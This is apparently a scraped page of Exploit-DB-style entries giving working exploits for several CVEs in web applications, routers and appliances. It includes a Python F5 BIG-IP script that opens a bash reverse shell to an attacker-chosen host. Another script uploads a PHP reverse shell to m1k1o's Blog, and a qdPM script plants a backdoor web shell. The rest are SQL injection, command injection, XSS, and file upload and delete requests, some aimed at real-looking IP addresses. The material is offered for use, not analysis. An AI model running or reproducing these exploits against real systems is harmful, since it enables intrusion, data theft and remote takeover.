ISHACK AI BOT

# Exploit Title: TLR-2005KSH - Arbitrary File Upload # Date: 2022-05-11 # Shodan Dork: title:"Login to TLR-2021" # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-45428 # Vulnerability Description # Due to the Via WebDAV (Web Distributed Authoring and Versioning), # on the remote server,telesquare TLR-2021 allows unauthorized users to upload # any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes # remote code execution as well. # Due to the WebDAV, it is possible to upload the arbitrary # file utilizing the PUT method. # Proof-of-Concept # Request PUT /l6f3jd6cbf.txt HTTP/1.1 Host: 223.62.114.233:8081<http://223.62.114.233:8081/> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Connection: close Content-Length: 10

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])

# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) # Date: 2022-24-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ # Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28079 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 ------------------------------------------------------------------------------------ 1. Description: ---------------------- College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'course_code' parameter and save it like poc.txt Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ 4. Burpsuite request: ---------------------- POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 80 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns

# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--

# Exploit Title: TLR-2005KSH - Arbitrary File Delete # Date: 2022-05-11 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-46424 # Proof-of-Concept # Request DELETE /cgi-bin/test2.txt HTTP/1.1 Host: 220.89.223.215:8083 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection # Date: 2022-05-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # CVE : CVE-2021-46422 # Tested on: Windows # HTTP Request GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 Host: IP_HERE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: */* Referer: http:// IP_HERE /admin/system_command.shtml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) # Date: May 11 2022 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: https://surveysparrow.com/ # Software Link: https://surveysparrow.com/enterprise-survey-software/ # Version: 2022 # Tested on: Windows # CVE : CVE-2022-29727 # References: https://www.tenable.com/cve/CVE-2022-29727 https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022 #POC For Stored XSS Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)// XSS Executed

# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) # Exploit Author: Alperen Ergel (alpernae IG/TW) # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # Date: 2022-05-10 # CVE :N/A ######## Description ######## # # 1-) Login administrator page and add product # # 2-) add product name to xss payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; [email protected]; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1028 Origin: https://domain.com Dnt: 1 Referer: https://domain.com/srv/admin/products/save-edit/index?id=12 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100 &StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0 &KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false &Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi= &TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw= &Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20 izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com% 2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0 &UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

# Exploit Title: SolarView Compact 6.0 - OS Command Injection # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29303 # Tested on: Windows # Exploit # HTTP Request : POST /conf_mail.php HTTP/1.1 Host: HOST_IP Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_IP/conf_mail.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M

# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin or with privilage user # Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path # Step-3: Capture the request save as .txt # Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent' # Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance' # # Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas... # # # ######## Proof of Concept ######################################## ========>>> REQUEST <<<========= GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst= &marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; [email protected]; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://domain.com/srv/admin/products/products-v2/index Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 =============> RESULTS OF THE SQLMAP <========================== Parameter: SatisAlt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 --- back-end DBMS: MySQL 5 available databases [2]: [*] d25082_db [*] information_schema [13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/star7th/showdoc # Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3 # Version: <= 2.10.3 # Tested on: macOS Monterey # CVE : CVE-2022-0967 Description: Stored XSS via uploading file in .ofd format 1. Create a file with .ofd extension and add XSS Payload inside the file filename = "payload.ofd" payload = "<script>alert(1)</script>" 2. Login to showdoc v2.10.2 and go to file library Endpoint = "https://www.site.com/attachment/index" 3. Upload the payload on file library and click on the check button 4. The XSS payload will executed once we visited the URL

# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-01-06 # Exploit Author: Malte V # Vendor Homepage: https://github.com/m1k1o/blog # Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip # Version: 1.3 and below # Tested on: Linux # CVE : CVE-2022-23626 import argparse import json import re from base64 import b64encode import requests as req from bs4 import BeautifulSoup parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False) parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False) parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False) parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) args = vars(parser.parse_args()) username = args['username'] password = args['password'] lhost_ip = args['ip'] lhost_port = args['lport'] address = args['url'] port = args['port'] url = f"http://{address}:{port}" blog_cookie = "" csrf_token = "" exploit_file_name = "" header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } def get_cookie(complete_url): global blog_cookie cookie_header = {} if not blog_cookie: cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" result = req.get(url=complete_url, headers=cookie_header) if result.status_code == 200: blog_cookie = result.cookies.get_dict()['PHPSESSID'] print(f'[+] Found PHPSESSID: {blog_cookie}') grep_csrf(result) def grep_csrf(result): global csrf_token csrf_regex = r"[a-f0-9]{10}" soup = BeautifulSoup(result.text, 'html.parser') script_tag = str(soup.findAll('script')[1].contents[0]) csrf_token = re.search(csrf_regex, script_tag).group(0) print(f'[+] Found CSRF-Token: {csrf_token}') def login(username, password): get_cookie(url) login_url = f"{url}/ajax.php" login_data = f"action=login&nick={username}&pass={password}" login_header = { "Host": f"{address}", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } result = req.post(url=login_url, headers=login_header, data=login_data) soup = BeautifulSoup(result.text, 'html.parser') login_content = json.loads(soup.text) if login_content.get('logged_in'): print('[*] Successful login') else: print('[!] Bad login') def set_cookie(result): global blog_cookie blog_cookie = result.cookies.get_dict()['PHPSESSID'] def generate_payload(command): return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """ def send_payload(): payload_header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" payload = generate_payload(command) print(f"[+] Upload exploit") result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) set_exploit_file_name(result.content.decode('ascii')) def set_exploit_file_name(data): global exploit_file_name file_regex = r"[a-zA-Z0-9]{4,5}.php" exploit_file_name = re.search(file_regex, data).group(0) def call_malicious_php(file_name): global header complete_url = f"{url}/data/i/{file_name}" print('[*] Calling reverse shell') result = req.get(url=complete_url) def check_reverse_shell(): yes = {'yes', 'y', 'ye', ''} no = {'no', 'n'} choice = input("Have you got an active netcat listener (y/Y or n/N): ") if choice in yes: return True elif choice in no: print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"") return False def main(): enabled_listener = check_reverse_shell() if enabled_listener: login(username, password) send_payload() call_malicious_php(exploit_file_name) if __name__ == "__main__": main()

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()

# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS) # Google Dork: NA # Date: 04/28/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://contao.org/en/ # Software Link: https://github.com/contao/contao/releases/tag/4.13.2 # Version: [ 4.13.2 ] # Tested on: [KALI OS] # CVE : CVE-2022-1588 # References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html --------------- Steps to reproduce: Navigate to the below URL URL: https://localhost/contao/"><svg//onload=alert(112233)>

